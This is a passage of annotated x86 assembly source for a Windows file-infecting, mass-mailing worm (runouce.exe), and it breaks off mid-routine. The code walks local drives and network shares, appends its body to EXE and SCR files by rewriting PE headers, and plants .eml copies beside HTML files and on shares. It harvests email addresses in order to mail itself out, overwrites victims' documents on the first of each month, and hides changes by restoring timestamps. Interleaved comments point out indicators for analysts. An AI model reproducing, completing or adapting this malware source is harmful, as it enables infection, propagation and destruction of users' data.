PushUser32ApiStr02:
call PushUser32ApiStr01
db 'FindWindowA',0
PushUser32ApiStr01:
call PushUser32ApiStr00
db 'GetWindowThreadProcessId',0
PushUser32ApiStr00:
sub ecx,esp
shr ecx,2
jmp eax
db 0e9h ;静态反汇编干扰
;-----------------------------------------------------------------------
; PushAdvApiStr: leaves the addresses of four advapi32 import-name
; strings on the stack (presumably resolved later by the caller, e.g.
; via GetProcAddress -- not visible here).
; Trick: each `call NextLabel` skips the string bytes that follow it and
; leaves the string's address on the stack as a "return address" that is
; never popped. Entered by CALL: `pop eax` takes the caller's return
; address so the closing `jmp eax` resumes in the caller with the
; pointers still on the stack.
; Out: ecx = number of pointers pushed ((entry esp - esp) / 4),
;      eax = caller's return address, [esp..] = the pointers.
; The names (RegNotifyChangeKeyValue / RegQueryValueExA / RegSetValueExA /
; RegOpenKeyA) are a usable static indicator of the registry activity.
;-----------------------------------------------------------------------
PushAdvApiStr:
pop eax ;eax = caller's return address (consumed from the stack)
mov ecx,esp ;remember esp before any pointer is pushed
call PushAdvApi03 ;pushes the address of the string below and skips it
db 'RegNotifyChangeKeyValue',0
PushAdvApi03:
call PushAdvApi02
db 'RegQueryValueExA',0
PushAdvApi02:
call PushAdvApi01
db 'RegSetValueExA',0
PushAdvApi01:
call PushAdvApi00
db 'RegOpenKeyA',0
PushAdvApi00:
sub ecx,esp ;ecx = bytes of pointers pushed
shr ecx,2 ;ecx = number of pointers pushed
jmp eax ;resume in the caller; the pointers stay on the stack
db 0e9h ;anti-disassembly junk byte (E9h = jmp rel32 opcode) after the unconditional jmp
;-----------------------------------------------------------------------
; PushMprApiStr: same call-over-string trick as PushAdvApiStr, for the
; three mpr.dll names used by the share enumeration (WNetCloseEnum /
; WNetEnumResourceA / WNetOpenEnumA).
; In:  entered by CALL.
; Out: ecx = number of pointers pushed, eax = caller's return address,
;      the string pointers remain on the stack.
;-----------------------------------------------------------------------
PushMprApiStr:
pop eax ;eax = caller's return address
mov ecx,esp ;esp before the pointers are pushed
call PushMprAPiStr02 ;pushes &'WNetCloseEnum' and skips over it
db 'WNetCloseEnum',0
PushMprAPiStr02:
call PushMprApiStr01
db 'WNetEnumResourceA',0
PushMprApiStr01:
call PushMprApiStr00
db 'WNetOpenEnumA',0
PushMprApiStr00:
sub ecx,esp ;ecx = bytes of pointers pushed
shr ecx,2 ;ecx = number of pointers
jmp eax ;back to the caller, pointers left on the stack
db 0e9h ;anti-disassembly junk byte (E9h = jmp rel32 opcode)
;-----------------------------------------------------------------------
; PushWsApiStr: call-over-string pusher for the nine winsock names the
; mail-sending code needs (recv, closesocket, socket, connect,
; gethostbyname, htons, send, WSACleanup, WSAStartup).
; In:  entered by CALL.
; Out: ecx = number of pointers pushed, eax = caller's return address,
;      the string pointers remain on the stack.
; The combination of these names with the SMTP/.eml routines further
; down is a good behavioural signature of the mailer component.
;-----------------------------------------------------------------------
PushWsApiStr:
pop eax ;eax = caller's return address
mov ecx,esp ;esp before the pointers are pushed
call PushWsApiStr08 ;pushes &'recv' and skips over it
db 'recv',0
PushWsApiStr08:
call PushWsApiStr07
db 'closesocket',0
PushWsApiStr07:
call PushWsApiStr06
db 'socket',0
PushWsApiStr06:
call PushWsApiStr05
db 'connect',0
PushWsApiStr05:
call PushWsApiStr04
db 'gethostbyname',0
PushWsApiStr04:
call PushWsApiStr03
db 'htons',0
PushWsApiStr03:
call PushWsApiStr02
db 'send',0
PushWsApiStr02:
call PushWsApiStr01
db 'WSACleanup',0
PushWsApiStr01:
call PushWsApiStr00
db 'WSAStartup',0
PushWsApiStr00:
sub ecx,esp ;ecx = bytes of pointers pushed
shr ecx,2 ;ecx = number of pointers
jmp eax ;back to the caller, pointers left on the stack
db 0e9h ;anti-disassembly junk byte (E9h = jmp rel32 opcode)
;-----------------------------------------------------------------------
; PushQQMsg: call-over-string pusher for eight message strings (Chinese
; text; by the routine name presumably sent through QQ by the caller --
; the sending code is not on this page).
; In:  entered by CALL.
; Out: ecx = entry esp minus current esp, i.e. the byte size of the
;      pointer block pushed (this routine does not shift ecx the way the
;      API-string pushers do); eax = caller's return address; the string
;      pointers remain on the stack.
; The message texts are static strings and therefore usable indicators.
;-----------------------------------------------------------------------
PushQQMsg:
pop eax ;eax = caller's return address
mov ecx,esp ;esp before the pointers are pushed
call PushQQMsg00 ;pushes the address of the message below and skips it
db '枪毙李洪志!',0
PushQQMsg00:
call PushQQMsg01
db '去他妈的法轮功!',0
PushQQMsg01:
call PushQQMsg02
db '反对邪教,崇尚科学!',0
PushQQMsg02:
call PushQQMsg03
db '打倒本拉登!',0
PushQQMsg03:
call PushQQMsg04
db '向英雄王伟致意!',0
PushQQMsg04:
call PushQQMsg05
db '反对霸权主义!',0
PushQQMsg05:
call PushQQMsg06
db '世界需要和平!',0
PushQQMsg06:
call PushQQMsg07
db '社会主义好!',0
PushQQMsg07:
sub ecx,esp ;ecx = bytes of pointers pushed
jmp eax ;back to the caller, pointers left on the stack
db 0e9h ;anti-disassembly junk byte (E9h = jmp rel32 opcode)
;-----------------------------------------------------------------------
; BuildVirusPathInStack(Stack): writes "<system directory>\runouce.exe"
; into the caller-supplied buffer at Stack (GetSystemDirectoryA is told
; the buffer holds 100h bytes).
; esi is expected to hold the import-block base ([esi.Knl*] slots); it
; is clobbered inside and restored by popad. All registers preserved.
; "<system dir>\runouce.exe" is the worm's dropped copy and the path
; every other routine here opens -- a direct host-based indicator.
;-----------------------------------------------------------------------
BuildVirusPathInStack proc Stack: dword
pushad
mov edi,Stack
call [esi.KnlGetSystemDirectoryA],edi,100h ;eax = length of the system directory string
add edi,eax ;edi -> NUL terminator of the system directory string
call GetVirusFileName ;pushes the address of the file-name string below
db '\runouce.exe',0
GetVirusFileName:
pop esi ;esi -> '\runouce.exe',0
mov ecx,16 ;copy 16 bytes (the string is 13 bytes incl. NUL; the rest are code bytes)
cld
rep movsb ;append the file name: the full virus path is now at Stack
popad
ret
BuildVirusPathInStack endp
db 0e9h ;静态反汇编干扰
;-----------------------------------------------------------------------
; EnumLogDrive: iterates the drive letters C: .. Z: (24 rounds) and
; hands every drive that is neither inaccessible nor a CD-ROM to
; EnumFileObject for a recursive directory walk.
; In:  esi = import-block base ([esi.Knl*]).
; Clobbers: eax, ecx, edx, flags (plus whatever EnumFileObject leaves;
; it saves/restores all registers itself).
;-----------------------------------------------------------------------
EnumLogDrive proc
;enumerate the files on the local logical drives
mov ecx,24 ;24 drive letters: C .. Z
mov edx,'\:C' ;dword whose little-endian bytes read "C:\",0
ContEnumLogDrive:
push ecx
push edx ;the root-path string now lives at [esp]
call [esi.KnlGetDriveTypeA],esp
cmp eax,2 ;below 2 (DRIVE_UNKNOWN / DRIVE_NO_ROOT_DIR): drive not accessible
jb short ContNextLogDrive
cmp eax,5 ;5 = DRIVE_CDROM: skip optical media
jz short ContNextLogDrive
call EnumFileObject,esp ;recursive walk starting at "X:\"
ContNextLogDrive:
pop edx
inc edx ;next drive letter (low byte of the dword)
pop ecx
loop short ContEnumLogDrive
ret
EnumLogDrive endp
db 0e9h ;静态反汇编干扰
;-----------------------------------------------------------------------
; EnumNetResource: enumerates the network neighbourhood level by level
; (root -> workgroups -> computers -> shares) through EnumNetObject and
; walks the files of each reachable share with EnumFileObject.
; edi carries the NETRESOURCE pointer handed to EnumNetObject as NetData;
; it is 0 (network root) on entry and is set by EnumNetObject before it
; invokes its callback.
; NOTE(review): every `call EnumNetObject,<flag>,edi` pushes only two
; arguments although EnumNetObject declares three (Flag, NetData,
; CallBack). The CallBack slot therefore appears to be filled by the
; return address pushed by the preceding `call PushEnumNet...`, i.e. the
; remainder of this routine acts as the per-item callback -- that is how
; the nesting is achieved. Confirm against the proc stack layout.
; The original label comments are translated literally; they are shifted
; by one level relative to the label names.
;-----------------------------------------------------------------------
EnumNetResource proc
;enumerate network resources
xor edi,edi ;edi: NetData (0 = start at the network root)
call PushEnumNetWorkGroup
call PushEnumNetComputer
call PushEnumNetComputerShareDir
call PushEnumNetFile
mov eax,[edi.lpRemoteName] ;remote name of the current NETRESOURCE (the share)
call EnumFileObject,eax;enumerate the files in the computer's shared directory
ret
db 0e9h ;anti-disassembly junk byte (E9h = jmp rel32 opcode)
PushEnumNetFile: ;enumerate the computer's shared directories
call EnumNetObject,RESOURCEUSAGE_CONNECTABLE,edi
ret
db 0e9h ;anti-disassembly junk byte
PushEnumNetComputerShareDir: ;enumerate computers
call EnumNetObject,RESOURCEUSAGE_CONTAINER,edi
ret
db 0e9h ;anti-disassembly junk byte
PushEnumNetComputer: ;enumerate workgroups
call EnumNetObject,RESOURCEUSAGE_CONTAINER,edi
ret
db 0e9h ;anti-disassembly junk byte
PushEnumNetWorkGroup: ;enumerate the network root
call EnumNetObject,RESOURCEUSAGE_CONTAINER,edi
ret
db 0e9h ;anti-disassembly junk byte
EnumNetResource endp
;-----------------------------------------------------------------------
; EnumNetObject(Flag, NetData, CallBack): enumerates one level of LAN
; objects with WNetOpenEnumA / WNetEnumResourceA (scope
; RESOURCE_GLOBALNET, type RESOURCETYPE_DISK) and invokes CallBack once
; per returned NETRESOURCE, passing its address in edi.
; In:  Flag     = dwUsage for WNetOpenEnumA (RESOURCEUSAGE_*)
;      NetData  = lpNetResource, the container to enumerate (0 = root)
;      CallBack = routine called per item with edi -> NETRESOURCE
;      esi      = import-block base ([esi.Mpr*])
; Stack: a MAX_BUFF_SIZE result buffer is carved out below the frame.
; All registers preserved (pushad/popad).
;-----------------------------------------------------------------------
EnumNetObject proc Flag:dword,NetData:dword,CallBack:dword
;used to enumerate one kind of LAN object
pushad
push eax ;reserve the hEnum output slot on the stack
call [esi.MprWNetOpenEnumA],RESOURCE_GLOBALNET,RESOURCETYPE_DISK,Flag,NetData,esp
pop ebx ;ebx = hEnum handle; also balances the stack
or eax,eax ;nonzero return = error
jnz short EnumNetObjectError
sub esp,MAX_BUFF_SIZE;carve out the result buffer on the stack
LoopEnumNetObject:
mov edx,esp ;edx -> result buffer
push L 1h ;lpcCount = 1: enumerate one item per call
mov eax,esp ;eax -> lpcCount
push MAX_BUFF_SIZE ;lpBufferSize
call [esi.MprWNetEnumResourceA],ebx,eax,edx,esp
pop ecx
pop ecx ;discard lpcCount and lpBufferSize: balance the stack
or eax,eax ;nonzero (no more items, or error) ends the loop
jnz short EnumNetObjectOver
mov edi,esp ;edi -> the NETRESOURCE just returned
call CallBack ;invoke the callback; its argument is passed in edi
jmp short LoopEnumNetObject
db 0e9h ;anti-disassembly junk byte (E9h = jmp rel32 opcode)
EnumNetObjectOver:
call [esi.MprWNetCloseEnum],ebx
add esp,MAX_BUFF_SIZE
EnumNetObjectError:
popad
ret
EnumNetObject endp
db 0e9h ;静态反汇编干扰
;-----------------------------------------------------------------------
; EnumFileObject(BootDir): makes BootDir the current directory, reports
; it through FoundDirObject, then walks its entries with
; FindFirstFileA / FindNextFileA: sub-directories are recursed into
; (each level carves a fresh MAX_BUFF_SIZE buffer off the stack), files
; are passed to FoundFileObject. Afterwards the current directory is
; moved back up with "..".
; Directories whose name starts with "winn" / "wind" after case folding
; (e.g. WINNT, WINDOWS) are skipped entirely.
; In:  BootDir -> NUL-terminated directory path; esi = import-block base.
; All registers preserved (pushad/popad).
;-----------------------------------------------------------------------
EnumFileObject proc BootDir:dword
;used to enumerate a directory / a shared directory on the network
pushad
mov eax,BootDir
mov eax,[eax] ;first 4 bytes of the directory name
or eax,20202020h ;fold ASCII letters to lower case
cmp eax,'nniw' ;"winn": do not infect WINN... directories
jz short SetDirError
cmp eax,'dniw' ;"wind": do not infect WIND... directories
jz short SetDirError
call [esi.KnlSetCurrentDirectoryA],BootDir ;make it the current directory
or eax,eax
jz short SetDirError
call FoundDirObject,BootDir
sub esp,MAX_BUFF_SIZE;stack buffer of MAX_BUFF_SIZE (1000h) bytes
mov [esp],L 2a2e2ah ;build the "*.*" search pattern at [esp]
mov eax,esp
call [esi.KnlFindFirstFileA],eax,esp ;the pattern buffer doubles as the WIN32_FIND_DATA output
mov ebx,eax ;ebx = search handle
cmp eax,-1 ;INVALID_HANDLE_VALUE
jz short EnumFileObjectError
LoopEnumFileObject:
call [esi.KnlFindNextFileA],ebx,esp
or eax,eax
jz short EnumFileObjectOver
lea edx,[esp.cFileName] ;edx -> name of the entry
mov eax,[esp.dwFileAttributes]
and eax,10h ;test FILE_ATTRIBUTE_DIRECTORY
jz short IsFileObject
IsDirObject: ;the entry is a directory
mov eax,[edx]
cmp al,'.' ;"." / ".." entries are not processed
jz short LoopEnumFileObject
call EnumFileObject,edx;recurse into the sub-directory
jmp short LoopEnumFileObject
db 0e9h ;anti-disassembly junk byte (E9h = jmp rel32 opcode)
IsFileObject: ;the entry is a file
call FoundFileObject,esp;process the file (esp -> WIN32_FIND_DATA)
jmp short LoopEnumFileObject
db 0e9h ;anti-disassembly junk byte
EnumFileObjectOver:
call [esi.KnlFindClose],ebx
EnumFileObjectError:
mov dword ptr[esp],L 2e2eh ;build the ".." string: return to the previous current directory
call [esi.KnlSetCurrentDirectoryA],esp
add esp,MAX_BUFF_SIZE;release the stack buffer
SetDirError:
popad
ret
EnumFileObject endp
db 0e9h ;静态反汇编干扰
;-----------------------------------------------------------------------
; FoundDirObject(DirName): invokes the directory callback whose pointer
; is stored in FoundDirCallBackAddr, under an exception frame.
; Mechanism (PushOptDirError): `pop ecx` recovers the address of the
; `popad` below; SetSehFrame (defined elsewhere) presumably registers a
; handler that resumes there. After the callback a deliberate `int 3`
; raises an exception, so control returns through that handler to
; popad/ret. A fault inside the callback is swallowed the same way --
; confirm against SetSehFrame.
; All registers preserved.
;-----------------------------------------------------------------------
FoundDirObject proc DirName: dword
pushad
call PushOptDirError ;pushes the address of the popad below
popad
ret
db 0e9h ;anti-disassembly junk byte (E9h = jmp rel32 opcode)
PushOptDirError:
pop ecx ;ecx = resume address for the exception-ignore frame
call SetSehFrame
call GetFoundDirCallBackAddr ;edx -> FoundDirCallBackAddr slot
call [edx],DirName ;invoke the directory callback
int 3 ;deliberate exception: unwinds to popad through the handler
FoundDirObject endp
db 0e9h ;静
;-----------------------------------------------------------------------
; FoundFileObject(FindData): invokes the file callback whose pointer is
; stored in FoundFileCallBackAddr, under an exception frame.
; Same construction as FoundDirObject: `pop ecx` yields the address of
; the `popad` below, SetSehFrame (elsewhere) presumably installs a
; handler resuming there, and the trailing `int 3` forces the unwind.
; Faults raised by the callback are swallowed the same way -- confirm
; against SetSehFrame.
; In:  FindData -> WIN32_FIND_DATA of the file. All registers preserved.
;-----------------------------------------------------------------------
FoundFileObject proc FindData:dword
pushad
call PushOptFileError ;pushes the address of the popad below
popad
ret
db 0e9h ;anti-disassembly junk byte (E9h = jmp rel32 opcode)
PushOptFileError:
pop ecx ;ecx = resume address for the exception-ignore frame
call SetSehFrame
call GetFoundFileCallBackAddr ;edx -> FoundFileCallBackAddr slot
call [edx],FindData ;invoke the file callback
int 3 ;deliberate exception: unwinds to popad through the handler
FoundFileObject endp
db 0e9h ;静态反汇编干扰
;-----------------------------------------------------------------------
; GetFoundDirCallBackAddr: returns edx = address of FoundDirCallBackAddr,
; a pointer-sized slot embedded in the code stream (filled in elsewhere;
; writing it at run time needs a writable code section, cf. the
; E0000000h section flags FixPeFile sets).
; The `call` pushes the slot's address as its return address, the `pop`
; recovers it, and the `ret` returns to the original caller.
; Out: edx -> FoundDirCallBackAddr. Clobbers: edx.
;-----------------------------------------------------------------------
GetFoundDirCallBackAddr:
call PushFoundDirCallBackAddr ;pushes the address of the dd slot below
FoundDirCallBackAddr dd ? ;in-code data slot: pointer to the directory callback
PushFoundDirCallBackAddr:
pop edx ;edx -> FoundDirCallBackAddr
ret
db 0e9h ;静态反汇编干扰
;-----------------------------------------------------------------------
; GetFoundFileCallBackAddr: returns edx = address of
; FoundFileCallBackAddr, a pointer-sized slot embedded in the code
; stream (filled in elsewhere). Same call/pop construction as
; GetFoundDirCallBackAddr.
; Out: edx -> FoundFileCallBackAddr. Clobbers: edx.
;-----------------------------------------------------------------------
GetFoundFileCallBackAddr:
call PushFoundFileCallBackAddr ;pushes the address of the dd slot below
FoundFileCallBackAddr dd ? ;in-code data slot: pointer to the file callback
PushFoundFileCallBackAddr:
pop edx ;edx -> FoundFileCallBackAddr
ret
db 0e9h ;静态反汇编干扰
;-----------------------------------------------------------------------
; GetFileExtName(FileName): scans to the NUL terminator and returns the
; last four bytes of the name, folded to lower case, packed in eax
; (for "x.exe" the bytes are '.','e','x','e', which the callers compare
; against constants such as 'exe.').
; In:  FileName -> NUL-terminated string (assumed at least 4 bytes long)
; Out: eax = last 4 bytes before the NUL, OR 20202020h
; Clobbers: eax, flags
;-----------------------------------------------------------------------
GetFileExtName proc FileName: dword
mov eax,FileName
ContIncEax:
inc eax
cmp byte ptr[eax],0 ;advance to the terminator
jnz short ContIncEax
mov eax,[eax-4] ;the 4 bytes immediately before the NUL
or eax,20202020h ;fold ASCII letters to lower case
ret
GetFileExtName endp
db 0e9h ;静态反汇编干扰
;-----------------------------------------------------------------------
; OptLocalDir(DirName): directory callback used on local drives. It only
; sleeps 10 ms so the directory walk does not produce a conspicuous CPU
; usage spike; DirName is not referenced.
; In: esi = import-block base.
;-----------------------------------------------------------------------
OptLocalDir proc DirName: dword
call [esi.KnlSleep],10;throttle: avoid an abnormal CPU-time footprint
ret
OptLocalDir endp
db 0e9h ;静态反汇编干扰
;-----------------------------------------------------------------------
; OptNetDir(NetDirName): directory callback used on network shares.
; Opens the worm's own file ("<system dir>\runouce.exe"), creates
; "<local computer name>.eml" in the current directory (the share set
; current by EnumFileObject) and calls MakeMailFile(0, hVirus, hEml)
; (defined elsewhere; by name it writes a mail message carrying the
; worm). NetDirName itself is not referenced.
; Indicator: "<hostname>.eml" files appearing on file shares.
; In:  esi = import-block base. Stack: 100h-byte scratch buffer.
; Clobbers: eax, ebx, edi, flags.
;-----------------------------------------------------------------------
OptNetDir proc NetDirName: dword
sub esp,100h
call BuildVirusPathInStack,esp ;[esp] = "<system dir>\runouce.exe"
mov edi,esp
call [esi.KnlLOpen],edi,0 ;open the worm file read-only (presumably _lopen, mode 0)
cmp eax,-1
jz short OptNetDirEnd
mov ebx,eax ;ebx = handle of the worm file
mov eax,100h
push eax ;nSize (in/out) for GetComputerNameA
mov eax,esp
call [esi.KnlGetComputerNameA],edi,eax ;overwrites the buffer with the computer name
pop eax ;eax = length of the computer name
add eax,edi
mov dword ptr[eax],'lme.' ;append ".eml"
mov dword ptr[eax+4],0 ;NUL terminate -> "<computer name>.eml"
call [esi.KnlLCreat],edi,0 ;create it in the current (share) directory
cmp eax,-1
jz short CloseVirFile
mov edi,eax ;edi = handle of the new .eml file
call MakeMailFile,0,ebx,edi
call [esi.KnlLClose],edi
CloseVirFile:
call [esi.KnlLClose],ebx
OptNetDirEnd:
add esp,100h
ret
OptNetDir endp
db 0e9h ;静态反汇编干扰
;-----------------------------------------------------------------------
; OptMailFile(FindData): file callback of the address-harvesting pass.
; Selects files by the last four characters of cFileName:
;   ".wab"                         -> EnumWabMail
;   ".adc", "r.db", ".doc", ".xls" -> EnumDbMail
; (EnumWabMail / EnumDbMail are defined elsewhere; by name they extract
; mail addresses from the file.)
; Destructive side effect: on the 1st of any month (SYSTEMTIME day == 1)
; a file that went through EnumDbMail is reopened read/write and its
; first 1234h bytes are overwritten with whatever is on the stack.
; In:  FindData -> WIN32_FIND_DATA; esi = import-block base.
; Clobbers: eax, ebx, edi, flags.
;-----------------------------------------------------------------------
OptMailFile proc FindData: dword
mov edi,FindData ;edi -> WIN32_FIND_DATA
lea ebx,[edi.cFileName]
call GetFileExtName,ebx ;eax = last 4 name bytes, lower-cased
cmp eax,'baw.' ;".wab": Outlook address book file
jz short IsWabFile
cmp eax,'cda.' ;".adc": FoxMail address book file
jz short IsDbFile
cmp eax,'bd.r' ;"r.db": OICQ address book file
jz short IsDbFile
cmp eax,'cod.' ;".doc"
jz short IsDbFile
cmp eax,'slx.' ;".xls"
jz short IsDbFile
ret
db 0e9h ;anti-disassembly junk byte (E9h = jmp rel32 opcode)
IsWabFile:
call EnumWabMail,ebx
ret
db 0e9h ;anti-disassembly junk byte
IsDbFile:
call EnumDbMail,ebx
sub esp,100h ;scratch space for SYSTEMTIME
call [esi.KnlGetSystemTime],esp
mov ax,[esp.stDay] ;ax = day of the month
add esp,100h
cmp ax,01 ;only on the 1st of the month
jnz short NoDelDbFile
call [esi.KnlLOpen],ebx,02 ;reopen the file read/write (mode 2)
cmp eax,-1
jz short NoDelDbFile
mov ebx,eax
call [esi.KnlLWrite],ebx,esp,1234h ;overwrite the file start with 1234h bytes of stack contents
call [esi.KnlLClose],ebx
NoDelDbFile:
ret
OptMailFile endp
db 0e9h ;静态反汇编干扰
;-----------------------------------------------------------------------
; OptExeFile(FindData): file callback of the infection pass. By the last
; four characters of cFileName:
;   ".exe", ".scr" -> FixPeFile   (append the worm body to the PE image)
;   ".htm", "html" -> FixHtmlFile
; Around either call the file attributes are cleared; afterwards the
; original creation / last-access / last-write times from the find data
; are written back with SetFileTime and the attributes are restored, so
; a modified file keeps its timestamps -- timestamp-based checks will
; not notice it; compare sizes or hashes instead.
; In:  FindData -> WIN32_FIND_DATA; esi = import-block base.
; Clobbers: eax, ebx, ecx, edx, edi, flags.
;-----------------------------------------------------------------------
OptExeFile proc FindData: dword
;prepare for modifying the PE file; afterwards restore the file's metadata
mov edi,FindData ;edi -> WIN32_FIND_DATA
lea ebx,[edi.cFileName]
call GetFileExtName,ebx ;eax = last 4 name bytes, lower-cased
cmp eax,'exe.' ;".exe": infect EXE files
jz short IsExeFile
cmp eax,'rcs.' ;".scr": infect SCR files
jz short IsExeFile
cmp eax,'mth.' ;".htm"
jz short IsHtmFile
cmp eax,'lmth' ;"html"
jz short IsHtmFile
ret
IsHtmFile:
call [esi.KnlSetFileAttributesA],ebx,L 0 ;clear the attributes (e.g. read-only)
call [esi.KnlLOpen],ebx,L 02 ;open read/write
cmp eax,-1
jz short OpenHtmlError
mov ebx,eax ;ebx = file handle
call FixHtmlFile,ebx
lea eax,[edi.ftCreationTime]
lea ecx,[edi.ftLastAccessTime]
lea edx,[edi.ftLastWriteTime]
call [esi.KnlSetFileTime],ebx,eax,ecx,edx ;put the original timestamps back
call [esi.KnlLClose],ebx
OpenHtmlError:
lea ebx,[edi.cFileName]
call [esi.KnlSetFileAttributesA],ebx,[edi.dwFileAttributes] ;put the original attributes back
ret
IsExeFile:
call [esi.KnlSetFileAttributesA],ebx,L 0 ;clear the attributes (e.g. read-only)
call [esi.KnlLOpen],ebx,L 02 ;open read/write
cmp eax,-1
jz short OpenFileError
mov ebx,eax ;ebx = file handle
call FixPeFile,ebx
lea eax,[edi.ftCreationTime]
lea ecx,[edi.ftLastAccessTime]
lea edx,[edi.ftLastWriteTime]
call [esi.KnlSetFileTime],ebx,eax,ecx,edx ;put the original timestamps back
call [esi.KnlLClose],ebx
OpenFileError:
lea ebx,[edi.cFileName]
call [esi.KnlSetFileAttributesA],ebx,[edi.dwFileAttributes] ;put the original attributes back
ret
OptExeFile endp
db 0e9h ;静态反汇编干扰
;-----------------------------------------------------------------------
; FixHtmlFile(hHtmlFile): creates "readme.eml" in the current directory
; and fills it via MakeMailFile(0, hVirus, hEml) from the worm's own
; file, then seeks hHtmlFile to its end and appends the 16 bytes
; CR LF "<html></html>" NUL.
; Indicators: "readme.eml" next to .htm/.html files; HTML files whose
; tail is exactly that byte sequence.
; In:  hHtmlFile = handle opened read/write by the caller; esi =
;      import-block base. Registers preserved (pushad/popad).
;-----------------------------------------------------------------------
FixHtmlFile proc hHtmlFile:dword
pushad
sub esp,100h
call BuildVirusPathInStack,esp ;[esp] = "<system dir>\runouce.exe"
mov eax,esp
call [esi.KnlLOpen],eax,0 ;open the worm file read-only
add esp,100h
cmp eax,-1
jz FixHtmlFileEnd
mov ebx,eax ;ebx = handle of the worm file
call GetEmlFile ;pushes the address of the string below
db 'readme.eml',0
GetEmlFile:
pop eax ;eax -> "readme.eml"
call [esi.KnlLCreat],eax,0 ;create it in the current directory
cmp eax,-1
jz FixHtmlOver
mov edi,eax ;edi = handle of readme.eml
call MakeMailFile,0,ebx,edi
call [esi.KnlLClose],edi
mov edi,hHtmlFile
call [esi.KnlLSeek],edi,L 0,L 02 ;seek to the end of the HTML file (origin 2)
call GetHtmlCode ;pushes the address of HtmlCodeStart
HtmlCodeStart:
db 0dh,0ah,'<html></html>',0
GetHtmlCode:
pop eax ;eax -> HtmlCodeStart
call [esi.KnlLWrite],edi,eax,offset GetHtmlCode-offset HtmlCodeStart ;append the 16 bytes
FixHtmlOver:
call [esi.KnlLClose],ebx
FixHtmlFileEnd:
popad
ret
FixHtmlFile endp
db 0e9h ;静态反汇编干扰
;-----------------------------------------------------------------------
; FixPeFile(hPeFile): appends the worm body (Start .. Start+VirusSize)
; to the end of the last section of a PE file and points the entry
; point at it; the old entry point (as a VA) is stored in the body's
; OldEntryRVA slot just before the body is written.
; Steps: read the first MAX_BUFF_SIZE bytes into a stack buffer; locate
; the PE header and the last section header (both bounds-checked
; against the frame); skip files whose entry already lies in the last
; section and starts with the bytes 60h E8h; grow the last section's raw
; and virtual size and SizeOfImage as needed; OR E0000000h into the
; section flags; append the body; write the patched header back.
; Detection hints visible in this code: entry point inside the last
; section, last section flagged E0000000h (execute|read|write), bytes
; 60 E8 at the entry point, file length grown by VirusSize.
; In:  hPeFile = handle opened read/write; esi = import-block base; ebp =
;      proc frame pointer (upper bound of the header buffer).
; Registers preserved (pushad/popad).
;-----------------------------------------------------------------------
FixPeFile proc hPeFile:dword
;modify the PE file: attach the virus body
pushad
sub esp,MAX_BUFF_SIZE
mov edi,esp ;edi -> header buffer
call [esi.KnlLRead],hPeFile,edi,MAX_BUFF_SIZE
movzx eax,word ptr[edi+PEHeaderOffset] ;low word of the PE header offset
add edi,eax ;edi -> PE header
cmp edi,ebp ;bounds check: must stay inside the buffer (below the frame)
ja FixPeFileOver
cmp [edi.fhPEFlag],'EP';check the "PE" signature
jnz FixPeFileOver
lea ebx,[edi.fhObjectTable00] ;ebx -> first section header
movzx ecx,[edi.fhObjectCount]
dec ecx
FindLastObjectTable:
add ebx,size ObjectTable ;advance to the last section header
loop FindLastObjectTable
cmp ebx,ebp ;bounds check
ja FixPeFileOver
mov eax,[edi.fhEntryRVA]
sub eax,[ebx.otRVA] ;already infected? entry RVA relative to the last section
jb short StartFixPeFile ;entry lies before the last section: not infected
add eax,[ebx.otPhysOffset] ;eax = file offset of the entry point
call [esi.KnlLSeek],hPeFile,eax,L 0
push eax
mov eax,esp
call [esi.KnlLRead],hPeFile,eax,04 ;read 4 bytes at the entry point
pop eax
cmp ax,0e860h ;bytes 60h E8h (pushad; call ...): the virus' first instructions?
jz FixPeFileOver ;already infected: leave the file alone
BuildVirusCodeInStack:
StartFixPeFile:
or [ebx.otFlags],0e0000000h ;section flags: Code|Init|Exec|Read|Write [CIERW]
call [esi.KnlLSeek],hPeFile,L 0,L 02;seek to the end: eax = file length
cmp eax,-1
jz short FixPeFileOver
push eax ;save the file length
add eax,VirusSize
sub eax,[ebx.otPhysOffset];new raw (physical) size of the last section
mov [ebx.otPhysSize],eax
mov edx,[ebx.otVirtSize]
cmp eax,edx
jb short NoFixVirtSize ;virtual size already covers the new raw size
mov [ebx.otVirtSize],eax;extend the virtual size
mov ecx,[edi.fhObjectAlign];section alignment
dec ecx
add eax,ecx ;round the new virtual size up
add edx,ecx ;round the old virtual size up
not ecx
and eax,ecx ;to a multiple of the alignment
and edx,ecx ;to a multiple of the alignment
sub eax,edx ;growth of SizeOfImage
add [edi.fhImageSize],eax;extend the total image size
NoFixVirtSize:
pop ecx ;ecx = file length
sub ecx,[ebx.otPhysOffset]
add ecx,[ebx.otRVA] ;new entry RVA = RVA of the appended body
xchg [edi.fhEntryRVA],ecx ;store it; ecx = old entry RVA
add ecx,[edi.fhImageBase] ;old entry point as a virtual address
call GetBaseAddress
GetBaseAddress:
pop edi ;edi = run-time address of GetBaseAddress
sub edi,offset GetBaseAddress-offset OldEntryRVA ;edi -> OldEntryRVA slot in the body
mov [edi],ecx ;record the old entry point there
WriteVirusToFile:
sub edi,offset OldEntryRVA-offset Start ;edi -> Start of the body
call [esi.KnlLWrite],hPeFile,edi,VirusSize ;append the body at the end of the file
cmp eax,-1
jz short FixPeFileOver
WritePeHeader:
call [esi.KnlLSeek],hPeFile,L 0,L 0 ;back to file offset 0
mov eax,esp
call [esi.KnlLWrite],hPeFile,eax,MAX_BUFF_SIZE ;write the patched header buffer back
FixPeFileOver:
add esp,MAX_BUFF_SIZE
popad
ret
FixPeFile endp
db 0e9h ;静态反汇编干扰
;-----------------------------------------------------------------------
; FoundMailObject(eMail): per-address callback of the mailer. Opens the
; worm's own file ("<system dir>\runouce.exe") and hands the handle
; together with the address to SmtpSendMail (defined elsewhere), then
; closes the file.
; In:  eMail -> recipient address; esi = import-block base.
; Stack: 100h-byte scratch buffer. Registers preserved (pushad/popad).
;-----------------------------------------------------------------------
FoundMailObject proc eMail: dword
pushad
sub esp,100h
call BuildVirusPathInStack,esp ;[esp] = "<system dir>\runouce.exe"
mov edi,esp
call [esi.KnlLOpen],edi,0 ;open the worm file read-only
cmp eax,-1
jz short FoundMailObjectEnd
mov ebx,eax ;ebx = handle of the worm file
call SmtpSendMail,eMail,ebx
call [esi.KnlLClose],ebx
FoundMailObjectEnd:
add esp,100h
popad
ret
FoundMailObject endp
EnumDbMail proc DbFile: dword
pushad
call [esi.KnlLOpen],DbFile,0
cmp eax,-1
jz EnumDbMailEnd
mov ebx,eax
sub esp,100h
ScanEmailStr:
mov edi,esp
xor edx,edx
ReadDbFile:
push edx
push eax
mov eax,esp